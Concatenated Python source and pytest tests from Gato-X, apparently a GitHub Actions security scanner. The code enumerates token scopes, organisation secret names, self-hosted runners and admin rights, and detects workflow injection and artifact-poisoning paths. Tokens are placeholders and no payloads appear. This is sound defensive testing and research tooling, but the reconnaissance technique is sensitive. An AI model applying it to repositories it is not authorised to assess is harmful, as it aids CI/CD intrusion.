    with open(test_wf_path) as wf_data:
        TEST_WORKFLOW_YML = wf_data.read()


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
def test_init(mock_api):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        skip_log=False,
    )

    assert gh_enumeration_runner.http_proxy == "localhost:8080"


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_self_enumerate(mock_api, capsys):
    """Test constructor for enumerator."""

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }
    mock_api.return_value.check_organizations.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        skip_log=False,
    )

    await gh_enumeration_runner.self_enumeration()

    captured = capsys.readouterr()

    print_output = captured.out
    assert "The user testUser belongs to 0 organizations!" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enumerate_repo_admin(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = repo_data

    await gh_enumeration_runner.enumerate_repo(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert "The user is an administrator on the" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enumerate_repo_admin_no_wf(mock_api, capsys):
    """Test constructor for enumerator."""

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy="localhost:8080",
        skip_log=False,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo"],
    }

    mock_api.return_value.retrieve_run_logs.return_value = BASE_MOCK_RUNNER

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    repo_data["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = repo_data

    await gh_enumeration_runner.enumerate_repo(repo_data["full_name"])

    captured = capsys.readouterr()

    print_output = captured.out

    assert " is public this token can be used to approve a" in escape_ansi(print_output)


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_validate(mock_api, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_organizations.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.validate_only()
    out, err = capfd.readouterr()
    assert "authenticated user is: testUser" in escape_ansi(out)
    assert "The user testUser belongs to 0 organizations!" in escape_ansi(out)


@patch("gatox.enumerate.ingest.ingest.asyncio.sleep")
@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_repo(mock_api, mock_time, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.enumerate_repo("octocat/Hello-World")
    out, err = capfd.readouterr()
    assert "Checking repository: octocat/Hello-World" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_called_once_with("octocat/Hello-World")


@patch("gatox.enumerate.ingest.ingest.asyncio.sleep")
@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_org(mock_api, mock_time, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow", "admin:org"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA
    mock_api.return_value.get_organization_details.return_value = TEST_ORG_DATA

    mock_api.return_value.get_org_secrets.return_value = [
        {
            "name": "DEPLOY_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "all",
        },
        {
            "name": "GH_TOKEN",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
            "visibility": "selected",
            "selected_repositories_url": "https://api.github.com/orgs/testOrg/actions/secrets/GH_TOKEN/repositories",
        },
    ]

    mock_api.return_value.check_org_runners.return_value = {
        "total_count": 1,
        "runners": [
            {
                "id": 21,
                "name": "ghrunner-test",
                "os": "Linux",
                "status": "online",
                "busy": False,
                "labels": [
                    {"id": 1, "name": "self-hosted", "type": "read-only"},
                    {"id": 2, "name": "Linux", "type": "read-only"},
                    {"id": 3, "name": "X64", "type": "read-only"},
                ],
            }
        ],
    }

    mock_api.return_value.check_org_repos.side_effect = [[TEST_REPO_DATA], [], []]

    mock_api.return_value.get_secrets.return_value = [
        {
            "name": "TEST_SECRET",
            "created_at": "2019-08-10T14:59:22Z",
            "updated_at": "2020-01-10T14:59:22Z",
        }
    ]

    mock_api.return_value.get_repo_org_secrets.return_value = []

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.enumerate_organization("github")

    out, err = capfd.readouterr()

    escaped_output = escape_ansi(out)

    assert "The organization has 2 secret(s)" in escaped_output
    assert "organization has 1 org-level self-hosted runners" in escaped_output
    assert "DEPLOY_TOKEN" in escaped_output
    assert "ghrunner-test" in escaped_output


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_repo_runner(mock_api, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repo_runners.return_value = [
        {
            "id": 2,
            "name": "17e749a1b008",
            "os": "Linux",
            "status": "offline",
            "busy": False,
            "labels": [
                {"id": 1, "name": "self-hosted", "type": "read-only"},
                {
                    "id": 2,
                    "name": "Linux",
                    "type": "read-only",
                },
                {
                    "id": 3,
                    "name": "X64",
                    "type": "read-only",
                },
            ],
        }
    ]

    test_repodata = TEST_REPO_DATA.copy()

    test_repodata["permissions"]["admin"] = True

    mock_api.return_value.get_repository.return_value = test_repodata

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.enumerate_repo("octocat/Hello-World")
    out, err = capfd.readouterr()

    escaped_output = escape_ansi(out)

    assert "The repository has 1 repo-level self-hosted runners!" in escaped_output

    assert "[!] The user is an administrator on the repository!" in escaped_output

    assert "Labels: self-hosted, Linux, X64" in escaped_output


@patch("gatox.enumerate.ingest.ingest.asyncio.sleep")
@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_repos(mock_api, mock_time, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.enumerate_repos(["octocat/Hello-World"])
    out, _ = capfd.readouterr()
    assert "Checking repository: octocat/Hello-World" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_called_once_with("octocat/Hello-World")


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_repos_empty(mock_api, capfd):
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.get_repository.return_value = TEST_REPO_DATA

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    await gh_enumeration_runner.enumerate_repos([])
    out, _ = capfd.readouterr()
    assert "The list of repositories was empty!" in escape_ansi(out)
    mock_api.return_value.get_repository.assert_not_called()


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_bad_token(mock_api):
    gh_enumeration_runner = Enumerator(
        "ghp_BADTOKEN",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    mock_api.return_value.is_app_token.return_value = False

    mock_api.return_value.check_user.return_value = None

    val = await gh_enumeration_runner.self_enumeration()

    assert val is False


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_unscoped_token(mock_api, capfd):
    gh_enumeration_runner = Enumerator(
        "ghp_BADTOKEN",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": [],
    }

    status = await gh_enumeration_runner.self_enumeration()

    out, _ = capfd.readouterr()
    assert "Self-enumeration requires the repo or public_repo scope!" in escape_ansi(
        out
    )
    assert status is False


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enum_self_no_repos(mock_api, capfd):
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
        output_json="test.json",
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo"],
    }

    orgs, repos = await gh_enumeration_runner.self_enumeration()

    assert orgs == []
    assert repos == []

    out, _ = capfd.readouterr()


@patch(
    "gatox.enumerate.enumerate.WorkflowGraphBuilder.build_graph_from_yaml",
    new_callable=AsyncMock,
)
@patch("gatox.enumerate.enumerate.Enumerator.process_graph", new_callable=AsyncMock)
@patch(
    "gatox.enumerate.repository.RepositoryEnum.enumerate_repository",
    new_callable=AsyncMock,
)
@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_enumerate_commit(mock_api, mock_enum_repo, mock_pg, mock_build):
    """Test commit enumeration functionality."""

    # Set up the mocks before creating the Enumerator
    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["repo", "workflow"],
    }

    repo_data = json.loads(json.dumps(TEST_REPO_DATA))
    mock_api.return_value.get_repository.return_value = repo_data
    mock_api.return_value.retrieve_workflow_ymls_ref.return_value = [
        Workflow(repo_data["full_name"], TEST_WORKFLOW_YML, "main.yaml")
    ]

    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    sha = "deadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
    repo = await gh_enumeration_runner.enumerate_commit(repo_data["full_name"], sha)

    mock_api.return_value.retrieve_workflow_ymls_ref.assert_called_once_with(
        repo_data["full_name"], sha
    )
    mock_build.assert_awaited()
    assert repo.name == repo_data["full_name"]


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_self_enumeration_with_public_repo_scope(mock_api, capfd):
    """Test that self_enumeration works with public_repo scope."""
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
        output_json="test.json",
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["public_repo"],  # Only public_repo scope, not repo
        "name": "Test User",
    }
    mock_api.return_value.get_own_repos.return_value = []
    mock_api.return_value.check_organizations.return_value = []

    # Mock the enumerate_repos method to return empty list for simplicity
    with patch.object(gh_enumeration_runner, "enumerate_repos", return_value=[]):
        orgs, repos = await gh_enumeration_runner.self_enumeration()

    # Should return tuple of empty lists, not False
    assert orgs == []
    assert repos == []
    assert isinstance(orgs, list)
    assert isinstance(repos, list)

    out, _ = capfd.readouterr()
    # Should not contain the error message about missing repo scope
    assert "Self-enumeration requires the repo or public_repo scope!" not in out


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_self_enumeration_fails_without_sufficient_scope(mock_api, capfd):
    """Test that self_enumeration fails without repo or public_repo scope."""
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
        output_json="test.json",
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["user"],  # Only user scope, no repo access
        "name": "Test User",
    }

    result = await gh_enumeration_runner.self_enumeration()

    # Should return False when no appropriate scope
    assert result is False

    out, err = capfd.readouterr()
    # Should contain the error message about missing scope
    assert "Self-enumeration requires the repo or public_repo scope!" in out


@patch("gatox.enumerate.enumerate.Api", return_value=AsyncMock(Api))
async def test_validate_only_with_public_repo_scope(mock_api, capfd):
    """Test that validate_only works with public_repo scope."""
    gh_enumeration_runner = Enumerator(
        "ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
        socks_proxy=None,
        http_proxy=None,
        skip_log=True,
    )

    mock_api.return_value.is_app_token.return_value = False
    mock_api.return_value.check_user.return_value = {
        "user": "testUser",
        "scopes": ["public_repo"],
        "name": "Test User",
    }
    mock_api.return_value.check_organizations.return_value = ["testorg"]

    result = await gh_enumeration_runner.validate_only()

    # Should not return False
    assert result
    assert isinstance(result, list)
    assert len(result) == 1

    out, _ = capfd.readouterr()
    # Should not contain the warning about insufficient access
    assert "Token does not have sufficient access to list orgs!" not in out



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging

from gatox.caching.cache_manager import CacheManager
from gatox.enumerate.results.complexity import Complexity
from gatox.enumerate.results.confidence import Confidence
from gatox.enumerate.results.issue_type import IssueType
from gatox.github.api import Api
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_graph.visitors.visitor_utils import VisitorUtils

logger = logging.getLogger(__name__)


class ArtifactPoisoningVisitor:
    """Visits the graph to find potential artifact poisoning vulnerabilities.

    This is where the workflow runs on workflow_run, then downloads an
    artifact, extracts it, and then runs code from it.
    """

    @staticmethod
    async def __process_path(path: list, graph: TaggedGraph, api: Api, results):
        # This function processes a single path to find artifact poisoning.
        # It checks if the path contains a workflow_run node that downloads
        # an artifact and then uses it in an unsafe manner.
        input_lookup = {}

        for index, node in enumerate(path):
            tags = node.get_tags()

            if "WorkflowNode" in tags:
                if index != 0 and "JobNode" in path[index - 1].get_tags():
                    # Caller job node
                    node_params = path[index - 1].params
                    # Set lookup for input params
                    input_lookup.update(node_params)
                if index == 0:
                    repo = CacheManager().get_repository(node.repo_name())
                    if repo.is_fork():
                        break

                    if node.excluded():
                        break
            elif "ActionNode" in tags:
                await VisitorUtils.initialize_action_node(graph, api, node)

                if "artifact" in node.get_tags():
                    # Terminal, we need to dfs to a sink now.
                    sinks = await graph.dfs_to_tag(node, "sink", api)
                    if sinks:

                        VisitorUtils.append_path(path, sinks[0])

                        VisitorUtils._add_results(
                            path,
                            results,
                            IssueType.ARTIFACT_POISONING,
                            complexity=Complexity.PREVIOUS_CONTRIBUTOR,
                            confidence=Confidence.MEDIUM,
                        )

    @staticmethod
    async def find_artifact_poisoning(graph: TaggedGraph, api: Api):
        # Unlike pwn requests, we are looking specifically
        # for cases of improper aritfact validation,
        # so we follow different logic focused on that.
        # Now we have all reponodes
        nodes = graph.get_nodes_for_tags(["workflow_run"])

        all_paths = []
        results = {}

        for cn in nodes:
            paths = await graph.dfs_to_tag(cn, "artifact", api)

            if paths:
                all_paths.append(paths)

        for path_set in all_paths:
            for path in path_set:
                try:

                    await ArtifactPoisoningVisitor.__process_path(
                        path, graph, api, results
                    )
                except Exception as e:
                    logger.warning(f"Error processing path: {e}")
                    logger.warning(f"Path: {path}")

        return results



from unittest.mock import AsyncMock, MagicMock, Mock, patch

import pytest

from gatox.github.api import Api
from gatox.workflow_graph.graph.tagged_graph import TaggedGraph
from gatox.workflow_graph.visitors.injection_visitor import InjectionVisitor


@pytest.fixture
def mock_api():
    mock_api = Mock(spec=Api)
    mock_api.get_all_environment_protection_rules = AsyncMock(return_value={})
    return mock_api


@pytest.fixture
def mock_graph():
    return Mock(spec=TaggedGraph)


class TestInjectionVisitor:
    """Test cases for InjectionVisitor"""

    async def test_find_injections_no_nodes(self, mock_graph, mock_api):
        """Test when no nodes are found with injection tags"""
        mock_graph.get_nodes_for_tags.return_value = []

        results = await InjectionVisitor.find_injections(mock_graph, mock_api)

        assert results == {}
        expected_tags = [
            "issue_comment",
            "pull_request_target",
            "fork",
            "issues",
            "discussion",
            "discussion_comment",
            "workflow_run",
        ]
        mock_graph.get_nodes_for_tags.assert_called_once_with(expected_tags)

    async def test_find_injections_ignore_workflow_run(self, mock_graph, mock_api):
        """Test that workflow_run tag is excluded when ignore_workflow_run is True"""
        mock_graph.get_nodes_for_tags.return_value = []

        await InjectionVisitor.find_injections(
            mock_graph, mock_api, ignore_workflow_run=True
        )

        expected_tags = [
            "issue_comment",
            "pull_request_target",
            "fork",
            "issues",
            "discussion",
            "discussion_comment",
        ]
        mock_graph.get_nodes_for_tags.assert_called_once_with(expected_tags)

    async def test_find_injections_include_workflow_run(self, mock_graph, mock_api):
        """Test that workflow_run tag is included when ignore_workflow_run is False"""
        mock_graph.get_nodes_for_tags.return_value = []

        await InjectionVisitor.find_injections(
            mock_graph, mock_api, ignore_workflow_run=False
        )

        expected_tags = [
            "issue_comment",
            "pull_request_target",
            "fork",
            "issues",
            "discussion",
            "discussion_comment",
            "workflow_run",
        ]
        mock_graph.get_nodes_for_tags.assert_called_once_with(expected_tags)

    async def test_find_injections_dfs_exception(self, mock_graph, mock_api):
        """Test exception handling during DFS operation"""
        mock_node = MagicMock()
        mock_graph.get_nodes_for_tags.return_value = [mock_node]
        mock_graph.dfs_to_tag = AsyncMock(side_effect=Exception("DFS error"))

        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.logger"
        ) as mock_logger:
            results = await InjectionVisitor.find_injections(mock_graph, mock_api)

            assert results == {}
            mock_logger.error.assert_any_call(
                "Error finding paths for injection node: DFS error"
            )
            mock_logger.error.assert_any_call(f"Node: {mock_node}")

    async def test_find_injections_no_paths(self, mock_graph, mock_api):
        """Test when DFS returns no paths"""
        mock_node = MagicMock()
        mock_graph.get_nodes_for_tags.return_value = [mock_node]
        mock_graph.dfs_to_tag = AsyncMock(return_value=None)

        results = await InjectionVisitor.find_injections(mock_graph, mock_api)

        assert results == {}
        mock_graph.dfs_to_tag.assert_called_once_with(mock_node, "injectable", mock_api)

    async def test_find_injections_with_job_node_deployment(self, mock_graph, mock_api):
        """Test path analysis with JobNode that has deployments"""
        # Setup mock job node with deployment
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.repo_name.return_value = "owner/repo"
        mock_job_node.deployments = ["production"]
        mock_job_node.get_env_vars.return_value = {"ENV_VAR": "github.event.test"}
        mock_job_node.outputs = None

        # Setup mock step node
        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = ["github.event.issue.title"]

        path = [mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_job_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            None,  # permission_blocker call
        ]

        # Mock environment protection rules
        mock_api.get_all_environment_protection_rules.return_value = {
            "production": True
        }

        with (
            patch(
                "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils.check_deployment_approval_gate",
                new_callable=AsyncMock,
            ) as mock_check_deploy,
            patch(
                "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils.process_context_var"
            ) as mock_process_context_var,
            patch(
                "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils._add_results"
            ) as mock_add_results,
        ):
            mock_check_deploy.return_value = True
            mock_process_context_var.return_value = "production"
            mock_add_results.return_value = None

            await InjectionVisitor.find_injections(mock_graph, mock_api)

            # Do not assert API call, since the method is mocked

    async def test_find_injections_with_step_node_injection(self, mock_graph, mock_api):
        """Test path analysis with StepNode injection"""
        # Setup mock job node
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.repo_name.return_value = "owner/repo"
        mock_job_node.deployments = []
        mock_job_node.get_env_vars.return_value = {
            "PR_BODY": "github.event.pull_request.body"
        }
        mock_job_node.outputs = None

        # Setup mock step node with injection
        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = ["github.event.issue.title"]

        path = [mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_job_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            None,  # permission_blocker call
        ]

        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils"
        ) as mock_visitor_utils:
            mock_visitor_utils._add_results.return_value = None

            with patch(
                "gatox.workflow_graph.visitors.injection_visitor.getToken"
            ) as mock_get_token:
                mock_get_token.return_value = "github.event.issue.title"

                with patch(
                    "gatox.workflow_graph.visitors.injection_visitor.checkUnsafe"
                ) as mock_check_unsafe:
                    mock_check_unsafe.return_value = True

                    await InjectionVisitor.find_injections(mock_graph, mock_api)

                    # Should call _add_results for the injection
                    mock_visitor_utils._add_results.assert_called()

    async def test_find_injections_with_permission_blocker(self, mock_graph, mock_api):
        """Test path analysis with permission blocker"""
        # Setup mock job node
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.repo_name.return_value = "owner/repo"
        mock_job_node.deployments = []
        mock_job_node.get_env_vars.return_value = {}
        mock_job_node.outputs = None

        # Setup mock step node
        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = ["github.event.issue.title"]

        path = [mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_job_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            [["blocker_path"]],  # permission_blocker call returns a path
        ]

        results = await InjectionVisitor.find_injections(mock_graph, mock_api)

        # Should break early due to permission blocker
        assert results == {}

    async def test_find_injections_with_workflow_node_fork(self, mock_graph, mock_api):
        """Test path analysis with WorkflowNode from fork repository"""
        # Setup mock workflow node
        mock_workflow_node = MagicMock()
        mock_workflow_node.get_tags.return_value = ["WorkflowNode"]
        mock_workflow_node.repo_name.return_value = "owner/repo"
        mock_workflow_node.get_env_vars.return_value = {}

        path = [mock_workflow_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_workflow_node]
        mock_graph.dfs_to_tag = AsyncMock(return_value=[path])

        # Mock repository as fork
        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.CacheManager"
        ) as mock_cache_manager:
            mock_repo = MagicMock()
            mock_repo.is_fork.return_value = True
            mock_cache_manager.return_value.get_repository.return_value = mock_repo

            results = await InjectionVisitor.find_injections(mock_graph, mock_api)

            # Should break early for fork repository
            assert results == {}

    async def test_find_injections_with_action_node(self, mock_graph, mock_api):
        """Test path analysis with ActionNode"""
        # Setup mock workflow node
        mock_workflow_node = MagicMock()
        mock_workflow_node.get_tags.return_value = ["WorkflowNode"]
        mock_workflow_node.repo_name.return_value = "owner/repo"
        mock_workflow_node.get_env_vars.return_value = {}

        # Setup mock action node
        mock_action_node = MagicMock()
        mock_action_node.get_tags.return_value = ["ActionNode"]

        path = [mock_workflow_node, mock_action_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_workflow_node]
        mock_graph.dfs_to_tag = AsyncMock(return_value=[path])

        # Mock repository as not fork
        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.CacheManager"
        ) as mock_cache_manager:
            mock_repo = MagicMock()
            mock_repo.is_fork.return_value = False
            mock_cache_manager.return_value.get_repository.return_value = mock_repo

            with patch(
                "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils"
            ) as mock_visitor_utils:
                mock_visitor_utils.initialize_action_node = AsyncMock()

                await InjectionVisitor.find_injections(mock_graph, mock_api)

                # Should initialize action node
                mock_visitor_utils.initialize_action_node.assert_called_with(
                    mock_graph, mock_api, mock_action_node
                )

    async def test_find_injections_with_job_outputs(self, mock_graph, mock_api):
        """Test path analysis with JobNode that has outputs"""
        # Setup mock job node with outputs
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.repo_name.return_value = "owner/repo"
        mock_job_node.deployments = []
        mock_job_node.get_env_vars.return_value = {"TEST_VAR": "github.event.test"}
        mock_job_node.outputs = {
            "output1": "env.TEST_VAR",  # String output referencing env var
            "output2": {"value": "test"},  # Non-string output
            "output3": "static_value",  # String output not referencing env
        }

        # Setup mock step node
        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = ["github.event.issue.title"]

        path = [mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_job_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            None,  # permission_blocker call
        ]

        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils"
        ) as mock_visitor_utils:
            mock_visitor_utils._add_results.return_value = None

            with patch(
                "gatox.workflow_graph.visitors.injection_visitor.getToken"
            ) as mock_get_token:
                mock_get_token.return_value = "github.event.issue.title"

                with patch(
                    "gatox.workflow_graph.visitors.injection_visitor.checkUnsafe"
                ) as mock_check_unsafe:
                    mock_check_unsafe.return_value = True

                    await InjectionVisitor.find_injections(mock_graph, mock_api)

                    # Should process outputs and handle different types
                    mock_visitor_utils._add_results.assert_called()

    async def test_find_injections_with_context_processing(self, mock_graph, mock_api):
        """Test path analysis with various context variable processing"""
        # Setup mock job node
        mock_job_node = MagicMock()
        mock_job_node.get_tags.return_value = ["JobNode"]
        mock_job_node.repo_name.return_value = "owner/repo"
        mock_job_node.deployments = []
        mock_job_node.get_env_vars.return_value = {
            "ENV_VAR": "github.event.pull_request.body",
            "SAFE_VAR": "github.event.pull_request.number",
        }
        mock_job_node.outputs = None

        # Setup mock step node with various context types
        mock_step_node = MagicMock()
        mock_step_node.get_tags.return_value = ["StepNode", "injectable"]
        mock_step_node.contexts = [
            "inputs.user_input",  # inputs. variable
            "env.ENV_VAR",  # env. variable
            "github.event.issue.title",  # direct github variable
            "${{ github.event.test }}",  # variable with ${{ }} syntax
        ]

        path = [mock_job_node, mock_step_node]

        mock_graph.get_nodes_for_tags.return_value = [mock_job_node]
        mock_graph.dfs_to_tag = AsyncMock()
        mock_graph.dfs_to_tag.side_effect = [
            [path],  # First call returns the main path
            None,  # permission_check call
            None,  # permission_blocker call
        ]

        with patch(
            "gatox.workflow_graph.visitors.injection_visitor.VisitorUtils"
        ) as mock_visitor_utils:
            mock_visitor_utils._add_results.return_value = None

            with patch(
                "gatox.workflow_graph.visitors.injection_visitor.CONTEXT_REGEX"
            ) as mock_regex:
                mock_regex.findall.return_value = ["github.event.test"]

                with patch(
                    "gatox.workflow_graph.visitors.injection_visitor.getToken"
                ) as mock_get_token:
                    mock_get_token.side_effect = lambda x: x  # Return input as-is

                    with patch(
                        "gatox.workflow_graph.visitors.injection_visitor.getTokens"
                    ) as mock_get_tokens:
                        mock_get_tokens.return_value = ["github.event.test"]

                        with patch(
                            "gatox.workflow_graph.visitors.injection_visitor.checkUnsafe"
                        ) as mock_check_unsafe:
                            mock_check_unsafe.return_value = True

                            await InjectionVisitor.find_injections(mock_graph, mock_api)

                            # Should process all context types and find injection
                            mock_visitor_utils._add_results.assert_called()

    async def test_find_injections_workflow_run_complexity(self, mock_graph, mock_api):
        """Test that workflow_run triggers get PREVIOUS_CONTRIBUTOR complexity"""
